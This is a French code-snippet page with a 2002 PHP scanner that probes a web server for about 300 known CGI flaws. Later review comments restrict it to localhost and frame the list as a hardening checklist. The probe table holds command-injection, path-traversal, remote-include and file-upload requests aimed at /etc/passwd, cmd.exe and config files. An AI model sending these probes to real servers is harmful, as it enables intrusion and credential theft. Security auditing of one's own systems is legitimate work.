Scanner de failles CGI (socket)

Contenu du snippet

Ce code permet de scanner les failles CGI sur un serveur ; bien sûr, cela est interdit et le script doit être utilisé en local (le code est théorique).

Exécuter le script :
script.php?host=adresseserv&path=repcgi
adresseserv > Adresse du serveur
repcgi > répertoire qui contient les CGI

Source / Exemple :


<?PHP

// Usage banner (printed on every request), followed by the probe table.
// Each entry is a path, optionally with a query string, that the scan loop
// further down concatenates directly after the `path` parameter; entries
// starting with "../" therefore point outside the CGI directory itself.
// Read as a hardening checklist: these are sample scripts, admin tools and
// credential/config files; one that is reachable on a production server
// should be removed or placed behind access control.
// NOTE(review): $cgi is appended to without ever being initialised. The
// script reads $host and $path as bare globals, so it appears written for
// register_globals; on such a setup a request parameter named cgi[] could
// pre-seed this list. An explicit `$cgi = array();` first would prevent it.
// NOTE(review): the table contains exact duplicates (e.g. start.php3 twice
// in each url/file/page/action group) and a few entries that look damaged
// in transcription ("..htimage.exe", "gi-bin/alibaba.pl\|dir"). They are
// kept exactly as published.
echo "Variables :<BR>host = adresse du site<BR>path = Répertoire des script CGI (ex : /cgi-bin/)<BR>";
echo "<BR><B>King 2002</B><BR><BR>";
// Legacy CGI sample programs, some requested with arguments that name
// /etc/passwd.
$cgi[] = "test-cgi?\help&0a/bin/cat%20/etc/passwd";
$cgi[] = "test-cgi?";
$cgi[] = "nph-test-cgi?";
$cgi[] = "nph-test-cgi?x";
$cgi[] = "php.cgi?/etc/passwd";
$cgi[] = "../cool-logs/mlog.html?screen=/etc/passwd";
$cgi[] = "phf?Qalias=x%0a/bin/cat%20/etc/passwd";
// Common PHP entry pages called with url=, file=, page= or action= set to an
// external URL (presumably aimed at include-from-parameter handling). The
// scan loop only looks for "200 OK", so a hit here shows that the page
// exists, not that the parameter was acted on.
$cgi[] = "../index.php?url=http://www.google.com";
$cgi[] = "../index.php3?url=http://www.google.com";
$cgi[] = "../index2.php?url=http://www.google.com";
$cgi[] = "../index2.php3?url=http://www.google.com";
$cgi[] = "../main.php?url=http://www.google.com";
$cgi[] = "../main.php3?url=http://www.google.com";
$cgi[] = "../default.php?url=http://www.google.com";
$cgi[] = "../default.php3?url=http://www.google.com";
$cgi[] = "../start.php3?url=http://www.google.com";
$cgi[] = "../start.php3?url=http://www.google.com";
$cgi[] = "../index.php?file=http://www.google.com";
$cgi[] = "../index.php3?file=http://www.google.com";
$cgi[] = "../index2.php?file=http://www.google.com";
$cgi[] = "../index2.php3?file=http://www.google.com";
$cgi[] = "../main.php?file=http://www.google.com";
$cgi[] = "../main.php3?file=http://www.google.com";
$cgi[] = "../default.php?file=http://www.google.com";
$cgi[] = "../default.php3?file=http://www.google.com";
$cgi[] = "../start.php3?file=http://www.google.com";
$cgi[] = "../start.php3?file=http://www.google.com";
$cgi[] = "../index.php?page=http://www.google.com";
$cgi[] = "../index.php3?page=http://www.google.com";
$cgi[] = "../index2.php?page=http://www.google.com";
$cgi[] = "../index2.php3?page=http://www.google.com";
$cgi[] = "../main.php?page=http://www.google.com";
$cgi[] = "../main.php3?page=http://www.google.com";
$cgi[] = "../default.php?page=http://www.google.com";
$cgi[] = "../default.php3?page=http://www.google.com";
$cgi[] = "../start.php3?page=http://www.google.com";
$cgi[] = "../start.php3?page=http://www.google.com";
$cgi[] = "../index.php?action=http://www.google.com";
$cgi[] = "../index.php3?action=http://www.google.com";
$cgi[] = "../index2.php?action=http://www.google.com";
$cgi[] = "../index2.php3?action=http://www.google.com";
$cgi[] = "../main.php?action=http://www.google.com";
$cgi[] = "../main.php3?action=http://www.google.com";
$cgi[] = "../default.php?action=http://www.google.com";
$cgi[] = "../default.php3?action=http://www.google.com";
$cgi[] = "../start.php3?action=http://www.google.com";
$cgi[] = "../start.php3?action=http://www.google.com";
// Mixed server-relative probes: Windows sample executables under /scripts,
// .htw and FrontPage shtml.dll requests, admin paths, and traversal or
// %00 variants of index.php.
$cgi[] = "../scripts/tools/newdsn.exe=";
$cgi[] = "../scripts/tools/dsnform.exe";
$cgi[] = "../scripts/tools/getdrvrs.exe";
$cgi[] = "../scripts/tools/mkilog.exe";
$cgi[] = "../null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full";
$cgi[] = "../_vti_bin/shtml.dll";
$cgi[] = "../_vti_bin/shtml.dll/nosuch.htm";
$cgi[] = "../?PageServices";
$cgi[] = "../admin";
$cgi[] = "../administration";
$cgi[] = "../index.php%00";
$cgi[] = "../index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc";
$cgi[] = "../index.php?page=../../../../../../../../../../etc/passwd";
$cgi[] = "../index.php?sql_debug=1";
$cgi[] = "imagemap";
$cgi[] = "../whisker.htw";
$cgi[] = "../admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt";
$cgi[] = "../?Open";
$cgi[] = "../?open";
$cgi[] = "../search/s97_cgi.exe";
$cgi[] = "../scripts/counter.exe";
$cgi[] = "../passwords.php";
$cgi[] = "../pass";
$cgi[] = "../cfide/administrator/index.cfm";
$cgi[] = "..htimage.exe";
$cgi[] = "..htimage.exe?2,2";
$cgi[] = "..imagemap.exe";
// Files that expose configuration or credentials when the web server hands
// them out (.htaccess/.htpasswd, FrontPage _vti_pvt/*.pwd, _private/*.txt),
// followed by vendor sample applications and their databases (ASP samples,
// ColdFusion cfdocs/cfusion).
$cgi[] = "../_private/form_results.txt";
$cgi[] = "../usr/local/apache/share/htdocs/.htaccess";
$cgi[] = "../usr/local/apache/share/htdocs/.htaccess";
$cgi[] = "../scripts/../../cmd.exe";
$cgi[] = "../....../autoexec.bat";
$cgi[] = "../.htaccess";
$cgi[] = "../.html/............/autoexec.bat";
$cgi[] = "../.htpasswd";
$cgi[] = "../_AuthChangeUrl";
$cgi[] = "../_AuthChangeUrl";
$cgi[] = "../_private/form_results.txt";
$cgi[] = "../_private/orders.txt";
$cgi[] = "../_private/register.txt";
$cgi[] = "../_private/registrations.txt";
$cgi[] = "../_vti_inf.html";
$cgi[] = "../_vti_pvt/administrator.pwd";
$cgi[] = "../_vti_pvt/administrators.pwd";
$cgi[] = "../_vti_pvt/author.log";
$cgi[] = "../_vti_pvt/authors.pwd";
$cgi[] = "../_vti_pvt/service.grp";
$cgi[] = "../_vti_pvt/service.pwd";
$cgi[] = "../_vti_pvt/users.pwd";
$cgi[] = "../admisapi/fpadmin.htm";
$cgi[] = "../adsamples/config/site.csc";
$cgi[] = "../AdvWorks/equipment/catalog_type.asp";
$cgi[] = "../ASPSamp/AdvWorks/equipment/catalog_type.asp";
$cgi[] = "../bb-dnbd/bb-hist.sh";
$cgi[] = "../carbo.dll";
$cgi[] = "../catalog.nsf";
$cgi[] = "../cfappman/index.cfm";
$cgi[] = "../cfappman/index.cfm";
$cgi[] = "../cfdocs/cfmlsyntaxcheck.cfm";
$cgi[] = "../cfdocs/cfmlsyntaxcheck.cfm";
$cgi[] = "../cfdocs/exampleapp/docs/sourcewindow.cfm";
$cgi[] = "../cfdocs/exampleapp/email/getfile.cfm";
$cgi[] = "../cfdocs/examples/cvbeans/beaninfo.cfm";
$cgi[] = "../cfdocs/examples/httpclient/mainframeset.cfm";
$cgi[] = "../cfdocs/examples/parks/detail.cfm";
$cgi[] = "../cfdocs/expelval/displayopenedfile.cfm";
$cgi[] = "../cfdocs/expelval/exprcalc.cfm";
$cgi[] = "../cfdocs/expelval/openfile.cfm";
$cgi[] = "../cfdocs/expelval/sendmail.cfm";
$cgi[] = "../cfdocs/expeval/displayopenedfile.cfm";
$cgi[] = "../cfdocs/expeval/exprcalc.cfm";
$cgi[] = "../cfdocs/expeval/openfile.cfm";
$cgi[] = "../cfdocs/expeval/sendmail.cfm";
$cgi[] = "../cfdocs/root.cfm";
$cgi[] = "../cfdocs/snippets/evaluate.cfm";
$cgi[] = "../cfdocs/snippets/fileexists.cfm";
$cgi[] = "../cfdocs/snippets/fileexists.cfm";
$cgi[] = "../cfdocs/snippets/gettempdirectory.cfm";
$cgi[] = "../cfusion/cfapps/forums/data/forums.mdb";
$cgi[] = "../cfusion/cfapps/security/data/realm.mdb";
$cgi[] = "../cfusion/cfapps/security/realm_.mdb";
$cgi[] = "../cfusion/database/cfsnippets.mdb";
$cgi[] = "../cfusion/database/cypress.mdb";
$cgi[] = "../cfusion/database/smpolicy.mdb";
// Names requested directly inside the CGI directory: legacy CGI programs,
// plus shells and interpreters (sh, bash, csh, ksh, tcsh, zsh, perl) that
// have no reason to be executable from a web-served directory.
$cgi[] = "add_ftp.cgi";
$cgi[] = "aglimpse";
$cgi[] = "alibaba.pl";
$cgi[] = "gi-bin/alibaba.pl\|dir";
$cgi[] = "AnyForm";
$cgi[] = "AnyForm2";
$cgi[] = "archie";
$cgi[] = "architext_query.pl";
$cgi[] = "ash";
$cgi[] = "AT-admin.cgi";
$cgi[] = "AT-generate.cgi";
$cgi[] = "ax-admin.cgi";
$cgi[] = "axs.cgi";
$cgi[] = "bash";
$cgi[] = "bb-hist.sh";
$cgi[] = "bigconf.cgi";
$cgi[] = "bnbform";
$cgi[] = "bnbform.cgi";
$cgi[] = "cachemgr.cgi";
$cgi[] = "calendar";
$cgi[] = "campas";
$cgi[] = "carbo.dll";
$cgi[] = "cgimail.exe";
$cgi[] = "Cgitest.exe";
$cgi[] = "cgiwrap";
$cgi[] = "classified.cgi";
$cgi[] = "classifieds";
$cgi[] = "classifieds.cgi";
$cgi[] = "Count.cgi";
$cgi[] = "csh";
$cgi[] = "date";
$cgi[] = "day5datacopier.cgi";
$cgi[] = "day5notifier";
$cgi[] = "dbmlparser.exe";
$cgi[] = "download.cgi";
$cgi[] = "dumpenv.pl";
$cgi[] = "edit.pl";
$cgi[] = "environ.cgi";
$cgi[] = "excite";
$cgi[] = "faxsurvey";
$cgi[] = "faxsurvey";
$cgi[] = "filemail";
$cgi[] = "filemail.pl";
$cgi[] = "files.pl";
$cgi[] = "finger";
$cgi[] = "finger.cgi";
$cgi[] = "finger.pl";
$cgi[] = "flexform";
$cgi[] = "flexform.cgi";
$cgi[] = "FormHandler.cgi";
$cgi[] = "formmail.pl";
$cgi[] = "fortune";
$cgi[] = "fpexplorer.exe";
$cgi[] = "get32.exe\|dir";
$cgi[] = "glimpse";
$cgi[] = "guestbook.cgi";
$cgi[] = "guestbook.pl";
$cgi[] = "GW5";
$cgi[] = "GWWEB.EXE";
$cgi[] = "handler";
$cgi[] = "handler.cgi";
$cgi[] = "htmlscript";
$cgi[] = "htmlscript";
$cgi[] = "info2www";
$cgi[] = "input.bat";
$cgi[] = "input2.bat";
$cgi[] = "jj";
$cgi[] = "ksh";
$cgi[] = "lwgate";
$cgi[] = "LWGate.cgi";
$cgi[] = "lwgate.cgi";
$cgi[] = "MachineInfo";
$cgi[] = "mail";
$cgi[] = "maillist.pl";
$cgi[] = "man.sh";
$cgi[] = "mlog.phtml";
$cgi[] = "mylog.phtml";
$cgi[] = "nlog-smb.pl";
$cgi[] = "nph-error.pl";
$cgi[] = "nph-publish";
$cgi[] = "nph-test-cgi";
$cgi[] = "passwd";
$cgi[] = "passwd.txt";
$cgi[] = "password";
$cgi[] = "password.txt";
$cgi[] = "perl";
$cgi[] = "perl.exe";
$cgi[] = "perlshop.cgi";
$cgi[] = "pfdispaly.cgi";
$cgi[] = "phf";
$cgi[] = "phf.pp";
$cgi[] = "php";
$cgi[] = "php.cgi";
$cgi[] = "phpscan";
$cgi[] = "post-query";
$cgi[] = "ppdscgi.exe";
$cgi[] = "query";
$cgi[] = "redirect";
$cgi[] = "responder.cgi";
$cgi[] = "rguest.exe";
$cgi[] = "rksh";
$cgi[] = "rsh";
$cgi[] = "rwwwshell.pl";
$cgi[] = "sam._";
$cgi[] = "search.cgi";
$cgi[] = "search97.vts";
$cgi[] = "sendform.cgi";
$cgi[] = "sh";
$cgi[] = "snorkerz.bat";
$cgi[] = "snorkerz.cmd";
$cgi[] = "status.cgi";
$cgi[] = "survey";
$cgi[] = "survey.cgi";
$cgi[] = "tcsh";
$cgi[] = "test.bat";
$cgi[] = "test-cgi";
$cgi[] = "test-cgi.tcl";
$cgi[] = "test-env";
$cgi[] = "textcounter.pl";
$cgi[] = "tst.bat";
$cgi[] = "tst.bat\|dir";
$cgi[] = "unlg1.1";
$cgi[] = "upload.pl";
$cgi[] = "uptime";
$cgi[] = "view-source";
$cgi[] = "visadmin.exe";
$cgi[] = "visitor.exe";
$cgi[] = "w3-msql";
$cgi[] = "w3-sql";
$cgi[] = "w3tvars.pm";
$cgi[] = "wais.pl";
$cgi[] = "webdist.cgi";
$cgi[] = "webgais";
$cgi[] = "webmap.cgi";
$cgi[] = "websendmail";
$cgi[] = "wguest.exe";
$cgi[] = "whois_raw.cgi";
$cgi[] = "wrap";
$cgi[] = "wwwadmin.pl";
$cgi[] = "wwwboard.pl";
$cgi[] = "www-sql";
$cgi[] = "zsh";
// Further server-relative paths: alternative CGI directories, .nsf
// databases, IIS password-change (.htr) pages and sample scripts, MSADC,
// upload handlers and plain-text password files.
$cgi[] = "../cgi-dos/args.bat";
$cgi[] = "../cgi-dos/args.cmd";
$cgi[] = "../cgi-shl/win-c-sample.exe";
$cgi[] = "../cgi-win/uploader.exe";
$cgi[] = "../cool-logs/mlog.html";
$cgi[] = "../cool-logs/mylog.html";
$cgi[] = "../database.nsf";
$cgi[] = "../database.nsf";
$cgi[] = "../domcfg.nsf";
$cgi[] = "../domlog.nsf";
$cgi[] = "../hosts.dat";
$cgi[] = "../iisadmpwd/achg.htr";
$cgi[] = "../IISADMPWD/achg.htr";
$cgi[] = "../iisadmpwd/aexp.htr";
$cgi[] = "../iisadmpwd/aexp2.htr";
$cgi[] = "../iisadmpwd/aexp2b.htr";
$cgi[] = "../iisadmpwd/aexp3.htr";
$cgi[] = "../iisadmpwd/aexp4.htr";
$cgi[] = "../iisadmpwd/aexp4b.htr";
$cgi[] = "../iisadmpwd/anot.htr";
$cgi[] = "../iisadmpwd/anot3.htr";
$cgi[] = "../iissamples/exair/howitworks/codebrws.asp";
$cgi[] = "../iissamples/sdk/asp/docs/codebrws.asp";
$cgi[] = "../log.nsf";
$cgi[] = "../manage/cgi/cgiproc";
$cgi[] = "../msadc/msadcs.dll";
$cgi[] = "../msadc/samples/adctest.asp";
$cgi[] = "../msadc/Samples/SELECTOR/codebrws.cfm";
$cgi[] = "../msadc/Samples/SELECTOR/showcode.asp";
$cgi[] = "../msads/samples/selector/showcode.asp";
$cgi[] = "../names.nsf";
$cgi[] = "../names.nsf";
$cgi[] = "../passwd";
$cgi[] = "../passwd.txt";
$cgi[] = "../password";
$cgi[] = "../password.txt";
$cgi[] = "../publisher/";
$cgi[] = "../samples/search/queryhit.htm";
$cgi[] = "../scripts/CGImail.exe";
$cgi[] = "../scripts/convert.bas";
$cgi[] = "../scripts/counter.exe";
$cgi[] = "../scripts/cpshost.dll";
$cgi[] = "../scripts/fpcount.exe";
$cgi[] = "../scripts/iisadmin/bdir.htr";
$cgi[] = "../scripts/iisadmin/ism.dll";
$cgi[] = "../scripts/iisadmin/tools/ctss.idc";
$cgi[] = "../scripts/iisadmin/tools/getdrvrs.exe";
$cgi[] = "../scripts/iisadmin/tools/mkilog.exe";
$cgi[] = "../scripts/issadmin/bdir.htr";
$cgi[] = "../scripts/perl";
$cgi[] = "../scripts/postinfo.asp";
$cgi[] = "../scripts/proxy/w3proxy.dll";
$cgi[] = "../scripts/samples/ctguestb.idc";
$cgi[] = "../scripts/samples/details.idc";
$cgi[] = "../scripts/samples/search/webhits.exe";
$cgi[] = "../scripts/tools/dsnform.exe";
$cgi[] = "../scripts/tools/getdrvrs.exe";
$cgi[] = "../scripts/tools/getdrvs.exe";
$cgi[] = "../scripts/tools/newdsn.exe";
$cgi[] = "../scripts/upload.asp";
$cgi[] = "../scripts/uploadn.asp";
$cgi[] = "../scripts/uploadx.asp";
$cgi[] = "../search";
$cgi[] = "../search97.vts";
$cgi[] = "../secure/.htaccess";
$cgi[] = "../secure/.wwwacl";
$cgi[] = "../session/adminlogin";
$cgi[] = "../showfile.asp";
$cgi[] = "../smdata.dat";
$cgi[] = "../ssi/envout.bat";
$cgi[] = "../today.nsf";
$cgi[] = "../tree.dat";
$cgi[] = "../WebSTAR";
$cgi[] = "../ws_ftp.ini";
$cgi[] = "../wwwboard/passwd.txt";

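// Scan loop: for every entry in $cgi, open a TCP connection to port 80 of
// the target, request "<path><entry>" and classify the entry from the first
// line of the response.
//
// Changes from the published version, all on the handling of request input:
//  - host/path are read from $_GET. The original used bare $host/$path,
//    which only exist with register_globals (removed in PHP 5.4).
//  - The target is limited to the loopback names below. The page says the
//    script is meant for local use only, yet the original connected to any
//    host a visitor supplied, so a deployed copy could be used to make the
//    web server send requests to arbitrary machines.
//  - path must start with "/" and hold only printable, non-space ASCII, so
//    a CR/LF in the parameter cannot add lines to the outgoing request.
//  - Everything echoed into the HTML page goes through htmlspecialchars().
//  - ereg() (removed in PHP 7) is replaced by strpos(); connect and read
//    timeouts keep an unresponsive target from hanging the script.
//  - The request line had two spaces after GET and bare "\n" line endings;
//    it now uses a single space and CRLF.

$host = (isset($_GET['host']) && is_string($_GET['host'])) ? strtolower(trim($_GET['host'])) : '';
$path = (isset($_GET['path']) && is_string($_GET['path'])) ? $_GET['path'] : '';

// Only the machine running the script may be scanned.
$allowedHosts = array('localhost', '127.0.0.1');

if ($host !== '') {

    if (!in_array($host, $allowedHosts, true)) {
        echo "Hôte refusé : ce script est réservé à un usage local (localhost ou 127.0.0.1)<br>\n";
    } elseif (!preg_match('#^/[\x21-\x7E]*\z#', $path)) {
        // \z, not $: "$" would still accept a trailing newline.
        echo "Chemin invalide : path doit commencer par / (ex : /cgi-bin/)<br>\n";
    } else {

        foreach ($cgi as $probe) {
            $label = htmlspecialchars($probe, ENT_QUOTES);

            $fp = fsockopen($host, 80, $errno, $errstr, 5);
            if (!$fp) {
                echo "Impossible de se connecter a " . htmlspecialchars($host, ENT_QUOTES) . " \n";
                break;
            }
            stream_set_timeout($fp, 5);

            fputs($fp, "GET $path$probe HTTP/1.0\r\n\r\n");

            // Only the status line matters. The original loop also stopped
            // after the first line it read (both branches ended in break).
            $statusLine = fgets($fp, 200);
            fclose($fp);

            // "200 OK" only means the server answered this URL. Servers that
            // return 200 for their error page make every entry look positive,
            // so each hit needs manual confirmation before it is treated as
            // a finding.
            if ($statusLine !== false && strpos($statusLine, '200 OK') !== false) {
                print("<b>Faille Potentielle : $label </b><br>\n");
            } else {
                print("Non trouvé $label <br> \n");
            }
        }
    }
}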

?>

Conclusion :


King 2002
www.jeuxenligne.fr.st
